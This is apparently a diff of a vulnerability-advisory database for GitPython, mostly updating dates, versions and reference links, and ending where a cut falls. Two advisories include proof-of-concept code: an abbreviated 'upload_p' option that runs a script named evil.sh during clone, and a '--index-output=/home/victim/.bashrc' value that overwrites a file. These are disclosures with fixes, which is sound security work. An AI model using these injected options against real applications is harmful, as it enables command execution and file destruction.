"resource": "gitpython" } ] }, "summary": "GitPython: Command Injection via git long-option prefix abbreviation bypass of CVE-2026-42215 blocklist", - "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**CWE:** CWE-184 (Incomplete List of Disallowed Inputs) → CWE-78 (OS Command Injection)\n**Severity:** inherits the parent CVE-2026-42215 surface; estimated High, ~8.8 (`AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`) — final scoring deferred to maintainer/CNA, mirroring the parent.\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", + "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2f96-g7mh-g2hx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67325" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2161" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-option-prefix-abbreviation" } ] } diff --git a/advisories/BREW-apm-CVE-2026-67326.json b/advisories/BREW-apm-CVE-2026-67326.json index 20afa797220..8bf2272f489 100644 --- a/advisories/BREW-apm-CVE-2026-67326.json +++ b/advisories/BREW-apm-CVE-2026-67326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-67326", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-mv93-w799-cj2w", "CVE-2026-67326" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.50", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-69097.json b/advisories/BREW-apm-CVE-2026-69097.json index ce462e81fc7..c9e4062ad84 100644 --- a/advisories/BREW-apm-CVE-2026-69097.json +++ b/advisories/BREW-apm-CVE-2026-69097.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-69097", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-3rp5-jjmw-4wv2", "CVE-2026-69097" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.53", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-69243.json b/advisories/BREW-apm-CVE-2026-69243.json index c4d7df8c8c0..4f3f6ca35de 100644 --- a/advisories/BREW-apm-CVE-2026-69243.json +++ b/advisories/BREW-apm-CVE-2026-69243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-69243", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-mfx4-hv73-q22v", "CVE-2026-69243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-69244.json b/advisories/BREW-apm-CVE-2026-69244.json index a4c98e794ba..d2f7572faf8 100644 --- a/advisories/BREW-apm-CVE-2026-69244.json +++ b/advisories/BREW-apm-CVE-2026-69244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-69244", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-cq5v-8q36-5273", "CVE-2026-69244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2026-73619.json b/advisories/BREW-apm-CVE-2026-73619.json index f8afc6018ea..c24ba5d92a8 100644 --- a/advisories/BREW-apm-CVE-2026-73619.json +++ b/advisories/BREW-apm-CVE-2026-73619.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-73619", "published": "2026-08-14T08:50:50Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-539m-9xh6-q6rr", - "CVE-2026-73619" + "CVE-2026-73619", + "PYSEC-2026-3948" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.57", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-73620.json b/advisories/BREW-apm-CVE-2026-73620.json index f769a5ef52b..42718b868dd 100644 --- a/advisories/BREW-apm-CVE-2026-73620.json +++ b/advisories/BREW-apm-CVE-2026-73620.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-73620", "published": "2026-08-14T08:50:50Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-3f7w-8rr8-f37f", - "CVE-2026-73620" + "CVE-2026-73620", + "PYSEC-2026-3949" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.57", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-73621.json b/advisories/BREW-apm-CVE-2026-73621.json index 247451e22bc..ee841c16db1 100644 --- a/advisories/BREW-apm-CVE-2026-73621.json +++ b/advisories/BREW-apm-CVE-2026-73621.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-73621", "published": "2026-08-14T08:50:50Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-p538-c434-8v24", - "CVE-2026-73621" + "CVE-2026-73621", + "PYSEC-2026-3950" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.56", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-73622.json b/advisories/BREW-apm-CVE-2026-73622.json index ea14ed24cad..474c47f6486 100644 --- a/advisories/BREW-apm-CVE-2026-73622.json +++ b/advisories/BREW-apm-CVE-2026-73622.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-73622", "published": "2026-08-14T08:50:50Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-94p4-4cq8-9g67", - "CVE-2026-73622" + "CVE-2026-73622", + "PYSEC-2026-3951" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.55", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-73623.json b/advisories/BREW-apm-CVE-2026-73623.json index dfd7dce0fe5..afad4b62604 100644 --- a/advisories/BREW-apm-CVE-2026-73623.json +++ b/advisories/BREW-apm-CVE-2026-73623.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-73623", "published": "2026-08-14T08:50:50Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-6p8h-3wgx-97gf", - "CVE-2026-73623" + "CVE-2026-73623", + "PYSEC-2026-3952" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.54", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-73624.json b/advisories/BREW-apm-CVE-2026-73624.json index f560dd658fc..74d4d0df2ce 100644 --- a/advisories/BREW-apm-CVE-2026-73624.json +++ b/advisories/BREW-apm-CVE-2026-73624.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-73624", "published": "2026-08-14T08:50:50Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-fjr4-x663-mwxc", "CVE-2026-73624" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.54", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-73625.json b/advisories/BREW-apm-CVE-2026-73625.json index a651a12057d..0a80ef822a9 100644 --- a/advisories/BREW-apm-CVE-2026-73625.json +++ b/advisories/BREW-apm-CVE-2026-73625.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-73625", "published": "2026-08-14T08:50:50Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-r9mr-m37c-5fr3", - "CVE-2026-73625" + "CVE-2026-73625", + "PYSEC-2026-3953" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.54", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2026-76217.json b/advisories/BREW-apm-CVE-2026-76217.json index 16e660a6af2..0a5eb11254c 100644 --- a/advisories/BREW-apm-CVE-2026-76217.json +++ b/advisories/BREW-apm-CVE-2026-76217.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-76217", "published": "2026-08-20T08:39:48Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-hh9p-6wh2-4mfc", - "CVE-2026-76217" + "CVE-2026-76217", + "PYSEC-2026-3841" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hh9p-6wh2-4mfc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76217" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-pathspec-from-file" } ] } diff --git a/advisories/BREW-apm-CVE-2026-76218.json b/advisories/BREW-apm-CVE-2026-76218.json index 0a1eb29f2a3..61c9c726bd1 100644 --- a/advisories/BREW-apm-CVE-2026-76218.json +++ b/advisories/BREW-apm-CVE-2026-76218.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-76218", "published": "2026-08-20T08:39:48Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-9rj7-rf2p-w77r", - "CVE-2026-76218" + "CVE-2026-76218", + "PYSEC-2026-3840" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-9rj7-rf2p-w77r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76218" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-repo-init" } ] } diff --git a/advisories/BREW-apm-CVE-2026-76219.json b/advisories/BREW-apm-CVE-2026-76219.json index 07854c56ef2..3c2f3ad36fe 100644 --- a/advisories/BREW-apm-CVE-2026-76219.json +++ b/advisories/BREW-apm-CVE-2026-76219.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2026-76219", "published": "2026-08-20T08:39:48Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-4gmw-gg2m-w46p", - "CVE-2026-76219" + "CVE-2026-76219", + "PYSEC-2026-3838" ], "affected": [ { @@ -32,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.58", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -45,14 +46,14 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] }, "summary": "GitPython: Unguarded git read-tree option forwarding in IndexFile.from_tree/reset/merge_tree enables arbitrary file overwrite", - "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "details": "## Summary\n`IndexFile.from_tree`, 